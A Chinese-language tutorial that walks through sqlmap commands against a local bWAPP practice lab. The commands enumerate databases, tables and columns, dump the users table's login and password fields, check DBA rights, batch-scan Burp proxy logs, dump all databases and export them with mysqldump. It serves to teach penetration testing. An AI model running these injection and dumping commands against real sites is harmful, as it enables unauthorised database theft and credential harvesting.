使用sqlmap获取数据步骤

文章目录

1.使用sqlmap获取所有数据库

--dbs

python sqlmap.py -u "http://127.0.0.1:9004/sqli_2.php?movie=1\&action=go" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" -f -b --batch --dbs

2.使用sqlmap获取当前连接数据库

--current-db

python sqlmap.py -u "http://127.0.0.1:9004/sqli_2.php?movie=1\&action=go" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" -f -b --batch --current-db

3.使用sqlmap获取当前数据库下所有表名

-D bwapp --tables

python sqlmap.py -u "http://127.0.0.1:9004/sqli_2.php?movie=1\&action=go" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" -f -b --batch -D bwapp --tables

4.使用sqlmap获取当前数据库下某个表下所有列名

-D bwapp -T users --column

python sqlmap.py -u "http://127.0.0.1:9004/sqli_2.php?movie=1\&action=go" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" -f -b --batch -D bwapp -T users --column

5.使用sqlmap获取当前数据库下某个表下指定字段的数据

-D bwapp -T users --dump -C "login,password"

python sqlmap.py -u "http://127.0.0.1:9004/sqli_2.php?movie=1\&action=go" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" -f -b --batch -D bwapp -T users --dump -C "login,password

6.测试当前用户是否是管理员

--is-dba

python sqlmap.py -u "http://127.0.0.1:9004/sqli_2.php?movie=1\&action=go" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" --is-dba

7.使用burp+sqlmap批量检测

首先打开burp的project options

依次点击Misc,勾选Logging下Proxy的requests

然后起一个保持文件,比如sqlmap.log

接着开启代理,随意访问,比如访问刚才的靶场SQL Injection (GET/Select)

然后它会自动把访问数据包追加到log文件中

接着我们使用sqlmap可以对log里的所有数据进行检测

python sqlmap.py -l G:\资料\sqlmap.log --batch

8.脱库命令

sqlmap脱库方法 --dump-all

可以自动扫描出当前电脑所装所有数据库数据

python sqlmap.py -u "http://127.0.0.1:9004/sqli_2.php?movie=1\&action=go" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" -f -b --batch --dump-all

mysql脱库方法

导出全部数据库

mysqldump -uroot -proot -A > allDatabase.sql

导出全部表空间信息

mysqldump -uroot -proot -A -Y > allTable.sql

9.sqlmap对post包的检测

--data="movie=1&action=go"

--data后面是post包最下面的参数

python sqlmap.py -u "http://127.0.0.1:9004/sqli_13.php" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" --data="movie=1&action=go" --batch

相关推荐
CryptoPP10 小时前
获取越南股票市场列表(包含VN30成分股)实战指南
大数据·服务器·数据库·区块链
阿巴~阿巴~11 小时前
Redis重大版本演进全解析:从2.6到7.0
服务器·数据库·redis·ubuntu·缓存·centos
qq_4046433412 小时前
MySQL中RUNCATE、DELETE、DROP 的基本介绍
数据库·mysql
像风一样!13 小时前
MySQL数据库如何实现主从复制
数据库·mysql
大白的编程日记.13 小时前
【MySQL】数据库表的CURD(二)
android·数据库·mysql
友善的鸡蛋13 小时前
项目中执行SQL报错oracle.jdbc.OracleDatabaseException: ORA-00942: 表或视图不存在
数据库·sql·oracle
The best are water13 小时前
jeesite mybatis添加拦截器,推送指定表的变更数据到其他数据库
数据库·mybatis
api_1800790546013 小时前
异步数据采集实践:用 Python/Node.js 构建高并发淘宝商品 API 调用引擎
大数据·开发语言·数据库·数据挖掘·node.js
怕什么真理无穷14 小时前
mysql server 9.4 windows安装教程(sqlyog 下载)
数据库
Olrookie14 小时前
MySQL运维常用SQL
运维·数据库·sql·mysql·dba